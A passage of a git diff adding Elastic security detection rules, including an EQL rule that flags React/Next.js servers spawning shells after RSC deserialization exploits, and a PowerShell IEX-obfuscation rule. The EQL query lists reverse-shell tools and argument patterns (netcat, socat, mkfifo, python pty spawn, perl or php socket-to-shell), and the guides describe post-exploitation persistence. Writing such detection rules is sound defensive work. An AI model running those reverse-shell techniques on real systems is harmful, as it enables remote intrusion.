a new agent policy, and deploy the agent on your system from which aws log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://www.elastic.co/docs/current/integrations/aws).\n", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.007", + "name": "Cloud Services", + "reference": "https://attack.mitre.org/techniques/T1021/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 212 + }, + "id": "ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_209.json b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_209.json index e90741fb90a..4e5aa9d03ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_209.json +++ b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_209.json @@ -25,7 +25,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_208.json b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_208.json index d07831157ef..0520823a6a2 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_208.json +++ b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_208.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/ad66db2e-1cc7-4a2c-8fa5-5f3895e44a18_4.json b/packages/security_detection_engine/kibana/security_rule/ad66db2e-1cc7-4a2c-8fa5-5f3895e44a18_4.json new file mode 100644 index 00000000000..1d61c202fe7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad66db2e-1cc7-4a2c-8fa5-5f3895e44a18_4.json @@ -0,0 +1,73 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a sudden drop in host based traffic. This can be due to a range of security issues, such as a compromised system, a failed service, or a network misconfiguration.", + "false_positives": [ + "Legitimate causes such as system maintenance, server shutdowns, or temporary network outages may trigger this alert." + ], + "from": "now-45m", + "interval": "5m", + "license": "Elastic License v2", + "machine_learning_job_id": "low_count_events_for_a_host_name", + "name": "Decline in host-based traffic", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Decline in host-based traffic\n\nHost-based traffic monitoring is crucial for identifying anomalies in network activity. A sudden drop in traffic can indicate issues like system compromise, service failure, or misconfiguration. Adversaries might exploit these situations to evade detection or disrupt services. The 'Decline in host-based traffic' rule leverages machine learning to identify unexpected traffic reductions, signaling potential security threats for further investigation.\n\n### Possible investigation steps\n\n- Review the affected host's recent activity logs to identify any unusual patterns or events that coincide with the drop in traffic.\n- Check for any recent changes in network configuration or firewall settings that might have inadvertently caused the traffic decline.\n- Investigate the status of critical services on the host to determine if any have failed or been stopped unexpectedly.\n- Analyze network traffic data to identify any potential signs of compromise, such as connections to known malicious IP addresses or unusual outbound traffic.\n- Consult with system administrators to verify if any maintenance or updates were performed around the time of the traffic drop that could explain the anomaly.\n\n### False positive analysis\n\n- Scheduled maintenance or updates can cause temporary drops in host-based traffic. Users should create exceptions for known maintenance windows to prevent false alerts.\n- Network configuration changes, such as firewall rule updates or routing adjustments, might lead to expected traffic reductions. Document and exclude these changes from triggering alerts.\n- Temporary service outages due to non-security related issues, like hardware failures or software bugs, can be mistaken for threats. Implement monitoring to distinguish between these and actual security incidents.\n- Low-usage periods, such as weekends or holidays, may naturally result in reduced traffic. Adjust the machine learning model to account for these patterns by incorporating historical data.\n- Legitimate changes in user behavior, such as remote work policies or shifts in business operations, can affect traffic levels. Regularly update the model to reflect these changes and avoid false positives.\n\n### Response and remediation\n\n- Isolate the affected host from the network to prevent potential lateral movement or further compromise.\n- Verify the integrity and functionality of critical services on the affected host to identify any failures or misconfigurations.\n- Conduct a thorough malware scan on the isolated host to detect and remove any malicious software.\n- Review recent configuration changes on the host and revert any unauthorized or suspicious modifications.\n- Restore any affected services from known good backups if service failure is confirmed as the cause.\n- Monitor network traffic for any signs of unusual activity or attempts to exploit the situation further.\n- Escalate the incident to the security operations team for a deeper forensic analysis and to determine if additional hosts are affected.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "risk_score": 21, + "rule_id": "ad66db2e-1cc7-4a2c-8fa5-5f3895e44a18", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1499", + "name": "Endpoint Denial of Service", + "reference": "https://attack.mitre.org/techniques/T1499/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "ad66db2e-1cc7-4a2c-8fa5-5f3895e44a18_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ae3e9625-89ad-4fc3-a7bf-fced5e64f01b_1.json b/packages/security_detection_engine/kibana/security_rule/ae3e9625-89ad-4fc3-a7bf-fced5e64f01b_1.json new file mode 100644 index 00000000000..24606560bab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ae3e9625-89ad-4fc3-a7bf-fced5e64f01b_1.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects suspicious child process activity from a React server application. This could be related to successful exploitation of CVE-2025-55182 or CVE-2025-66478. These vulnerabilities allow attackers to execute remote code due to insecure deserialization of React Server Components (RSC) Flight payloads, leading to unauthenticated RCE on servers running React 19.x or Next.js 14.3.0-canary+, 15.x, and 16.x with the App Router enabled", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious React Server Child Process", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious React Server Child Process\n\nThis rule flags suspicious shell or system utility processes spawned by a React or Next.js server application\u2014clear evidence of CVE-2025-55182 or CVE-2025-66478 exploitation enabling arbitrary code execution. An attacker sends a specially crafted RSC Flight protocol payload to a vulnerable Next.js or React Server Components endpoint, causing the server to deserialize untrusted data and execute attacker-controlled JavaScript, which then spawns shell commands or system utilities to establish initial access and persistence.\n\n### Possible investigation steps\n\n- Extract the parent Node.js process command line and working directory to identify the React or Next.js application, then check package.json or package-lock.json for React version (19.0-19.2) and Next.js version (14.3.0-canary, 15.x, 16.x) to confirm vulnerability.\n- Review web server access logs (Nginx, Apache, ALB) for suspicious POST requests to RSC endpoints (/_next/data/, /.next/, /api/) in the minutes before the shell spawn, focusing on requests with unusual Content-Type headers (text/x-component, application/rsc) or large payload sizes.\n- Analyze the spawned child process command line, arguments, working directory, and any downloaded files or scripts to identify the payload type (reverse shell, data exfiltration, credential theft, persistence mechanism) and compute file hashes for threat intelligence correlation.\n- Pivot on the source IP address from web logs across other hosts and applications to identify additional compromised servers, and check for lateral movement attempts or scanning activity from the compromised host to internal networks.\n- Examine the host for post-exploitation artifacts including new cron jobs, modified .bashrc/.profile files, SSH authorized_keys additions, new user accounts, unusual network connections to external IPs, files in /tmp or /var/tmp directories, and container escape attempts (nsenter, docker socket access).\n\n### False positive analysis\n\n- Legitimate build or deployment scripts triggered by CI/CD pipelines may cause Next.js build workers (jest-worker/processChild.js) to spawn shell commands; filter these by excluding processes with --node-ipc flags or running in /builds/, /workspace/, or other CI directories.\n- Development servers (next dev, expo start, react-scripts start) running on developer workstations may spawn legitimate shells for tooling; consider excluding NODE_ENV=development or processes running from user home directories if appropriate for your environment.\n- Server-side rendering (SSR) frameworks may legitimately invoke system utilities for image processing, PDF generation, or other server-side tasks; maintain an allowlist of expected child processes and their arguments for known applications.\n\n### Response and remediation\n\n- Immediately isolate the affected host to prevent lateral movement, terminate the Node.js parent process and all child processes spawned from the React/Next.js server, and block the source IP address at the firewall and WAF level.\n- Remove any persistence mechanisms installed by the attacker including cron jobs (check crontab -l for all users), modified shell initialization files (~/.bashrc, ~/.profile, /etc/profile.d/), SSH keys in ~/.ssh/authorized_keys, and systemd timers or service units.\n- Rotate all credentials and secrets accessible to the compromised application including database passwords, API keys, cloud service credentials (AWS/Azure/GCP), and session tokens, assuming they may have been exfiltrated.\n- Collect forensic artifacts including memory dumps of the Node.js process (if still running), packet captures of the malicious HTTP request, web server access and error logs, application logs from the React/Next.js server, and copies of any files created in /tmp, /var/tmp, or the application directory.\n- Escalate to incident command if the attacker achieved container escape (nsenter usage detected), accessed sensitive data or credentials, established C2 communication to external infrastructure, or if multiple hosts show similar exploitation patterns from the same source.\n- Patch immediately by upgrading React to version 19.0.1+, 19.1.2+, or 19.2.1+, and Next.js to versions 14.3.0-canary.88+, 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, or 16.0.7+ depending on your major version, and deploy WAF rules to block malformed RSC payloads at the application edge.\n", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"executed\", \"start\", \"process_started\") and (\n process.name in (\n \"sh\", \"bash\", \"zsh\", \"curl\", \"wget\", \"id\", \"whoami\", \"uname\", \"cmd.exe\", \"cat\", \"powershell.exe\", \"java\", \"rundll32.exe\", \"wget.exe\", \"certutil.exe\",\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"nc.traditional\", \"socat\", \"busybox\", \"mkfifo\", \"nohup\", \"setsid\", \"xterm\"\n ) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name == \"node\" and process.args == \"-e\" and process.args : \"*spawn*sh*\" and process.args : \"*connect*\") or\n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name in (\"rvim\", \"vim\", \"vimdiff\", \"rview\", \"view\") and process.args == \"-c\" and process.args : \"*socket*\")\n)\nand (\n ?process.working_directory : (\n \"*react-dom*\", \"*.next*\", \"*node_modules/next*\", \"*react-server*\", \"*bin/next*\", \"*--experimental-https*\", \"*app/server*\",\n \"*.pnpm/next*\", \"*/app/*\", \"*next/dist/server*\", \"*react-scripts*\") or\n (\n process.parent.name in (\"node\", \"bun\", \"node.exe\", \"bun.exe\") and\n process.parent.command_line : (\n \"*react-dom*\", \"*.next*\", \"*node_modules/next*\", \"*react-server*\", \"*next-server*\", \"*server.js*\", \"*bin/next*\",\n \"*--experimental-https*\", \"*app/server*\", \"*.pnpm/next*\", \"*next start*\", \"*next dev*\", \"*react-scripts start*\", \"*next/dist/server*\"\n )\n )\n) and not (\n ?process.parent.executable in (\"./runc\", \"/opt/google/chrome/chrome\") or\n process.command_line like \"/bin/sh -c git config*\"\n)\n", + "references": [ + "https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ae3e9625-89ad-4fc3-a7bf-fced5e64f01b", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: SentinelOne", + "Data Source: Sysmon", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "ae3e9625-89ad-4fc3-a7bf-fced5e64f01b_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_6.json b/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_6.json new file mode 100644 index 00000000000..06ce99dc712 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_6.json @@ -0,0 +1,173 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that reconstruct the IEX (Invoke-Expression) command at runtime using indexed slices of environment variables. This technique leverages character access and join operations to build execution logic dynamically, bypassing static keyword detection and evading defenses such as AMSI.", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential Dynamic IEX Reconstruction via Environment Variables", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Dynamic IEX Reconstruction via Environment Variables\n\nPowerShell's Invoke-Expression (IEX) command is a powerful tool for executing strings as code, often exploited by attackers to run obfuscated scripts. Adversaries may dynamically reconstruct IEX using environment variables to evade static detection. The detection rule identifies scripts that manipulate environment variables to form IEX commands, focusing on patterns of character slicing and joining, which are indicative of obfuscation techniques. By analyzing script length and specific patterns, the rule effectively flags potential misuse, aiding in defense against such evasion tactics.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script, focusing on how environment variables are manipulated to reconstruct the IEX command.\n- Examine the file.path and host.name fields to determine the origin and location of the script execution, which can provide context on whether the activity is expected or suspicious.\n- Analyze the user.id and agent.id fields to identify the user and agent responsible for executing the script, checking for any anomalies or unauthorized access.\n- Investigate the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other related PowerShell activities on the host.\n- Assess the count field to understand the extent of obfuscation patterns detected, which can indicate the complexity and potential maliciousness of the script.\n\n### False positive analysis\n\n- Scripts with legitimate use of environment variables for configuration management may trigger the rule. Users can create exceptions for specific scripts or processes known to use environment variables in a non-threatening manner.\n- Automated scripts that dynamically construct commands for legitimate administrative tasks might be flagged. Review the script's purpose and source, and whitelist trusted scripts or processes.\n- Development environments where scripts are frequently tested and modified may produce false positives. Implement monitoring exclusions for development machines or specific user accounts involved in script testing.\n- Scripts using environment variables for localization or language settings can be mistakenly identified. Identify and exclude scripts that are part of standard localization processes.\n- PowerShell scripts from trusted vendors or software packages that use environment variables for legitimate functionality should be reviewed and excluded from detection if verified as safe.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further execution of potentially malicious scripts and limit lateral movement.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Review the PowerShell script block text and associated file paths to understand the scope and intent of the script, focusing on any obfuscated commands or environment variable manipulations.\n- Restore the system from a known good backup if malicious activity is confirmed and system integrity is compromised.\n- Update endpoint protection and intrusion detection systems to recognize and block similar obfuscation patterns in PowerShell scripts.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement additional monitoring for unusual PowerShell activity and environment variable manipulations to enhance detection of similar threats in the future.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"(?i)(\\$(?:\\w+|\\w+\\:\\w+)\\[\\d++\\]\\+\\$(?:\\w+|\\w+\\:\\w+)\\[\\d++\\]\\+['\"]x['\"]|\\$(?:\\w+\\:\\w+)\\[\\d++,\\d++,\\d++\\]|\\.name\\[\\d++,\\d++,\\d++\\])\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b0c98cfb-0745-4513-b6f9-08dddb033490", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 6 + }, + "id": "b0c98cfb-0745-4513-b6f9-08dddb033490_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b240bfb8-26b7-4e5e-924e-218144a3fa71_108.json b/packages/security_detection_engine/kibana/security_rule/b240bfb8-26b7-4e5e-924e-218144a3fa71_108.json new file mode 100644 index 00000000000..91b09eba86d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b240bfb8-26b7-4e5e-924e-218144a3fa71_108.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected an unusually large spike in network traffic. Such a burst of traffic, if not caused by a surge in business activity, can be due to suspicious or malicious activity. Large-scale data exfiltration may produce a burst of network traffic; this could also be due to unusually large amounts of reconnaissance or enumeration traffic. Denial-of-service attacks or traffic floods may also produce such a surge in traffic.", + "false_positives": [ + "Business workflows that occur very occasionally, and involve an unusual surge in network traffic, can trigger this alert. A new business workflow or a surge in business activity may trigger this alert. A misconfigured network application or firewall may trigger this alert." + ], + "from": "now-30m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "high_count_network_events", + "name": "Spike in Network Traffic", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Spike in Network Traffic\nMachine learning models analyze network traffic patterns to identify anomalies, such as unexpected spikes. These spikes may indicate malicious activities like data exfiltration or denial-of-service attacks. Adversaries exploit network vulnerabilities to flood traffic or extract data. The 'Spike in Network Traffic' rule leverages ML to flag unusual traffic surges, aiding in early threat detection and response.\n\n### Possible investigation steps\n\n- Review the timestamp and duration of the traffic spike to determine if it correlates with any scheduled business activities or known events.\n- Analyze the source and destination IP addresses involved in the traffic spike to identify any unfamiliar or suspicious entities.\n- Examine the types of network protocols and services involved in the spike to assess if they align with typical network usage patterns.\n- Check for any recent changes in network configurations or security policies that might explain the unusual traffic patterns.\n- Investigate any associated user accounts or devices to determine if they have been compromised or are exhibiting unusual behavior.\n- Cross-reference the spike with other security alerts or logs to identify potential patterns or related incidents.\n\n### False positive analysis\n\n- Business-related traffic surges: Regular spikes due to legitimate business activities, such as marketing campaigns or software updates, can trigger false positives. Users should analyze historical traffic patterns and create exceptions for known business events.\n- Scheduled data backups: Routine data backups can cause significant network traffic. Users can exclude these by identifying backup schedules and configuring the rule to ignore traffic during these times.\n- Software updates and patches: Large-scale updates from software vendors can lead to temporary traffic spikes. Users should maintain a list of update schedules and whitelist these events to prevent false alerts.\n- Internal network scans: Regular security scans or inventory checks within the organization may cause traffic spikes. Users should document these activities and adjust the rule to recognize them as non-threatening.\n- Cloud service synchronization: Synchronization activities with cloud services can generate high traffic volumes. Users should identify and exclude these regular sync patterns to reduce false positives.\n\n### Response and remediation\n\n- Immediately isolate affected systems from the network to prevent further data exfiltration or traffic flooding.\n- Conduct a thorough analysis of network logs to identify the source and destination of the traffic spike, focusing on any unauthorized or suspicious IP addresses.\n- Block identified malicious IP addresses and domains at the firewall and update intrusion prevention systems to prevent further access.\n- If data exfiltration is suspected, perform a data integrity check to assess any potential data loss or compromise.\n- Notify the incident response team to assess the situation and determine if further escalation is necessary, including potential involvement of law enforcement if data theft is confirmed.\n- Review and update network access controls and permissions to ensure only authorized users and devices have access to sensitive data and systems.\n- Implement enhanced monitoring and alerting for similar traffic patterns to improve early detection and response to future incidents.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "network_traffic", + "version": "^1.33.0" + } + ], + "risk_score": 21, + "rule_id": "b240bfb8-26b7-4e5e-924e-218144a3fa71", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Network Packet Capture\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic 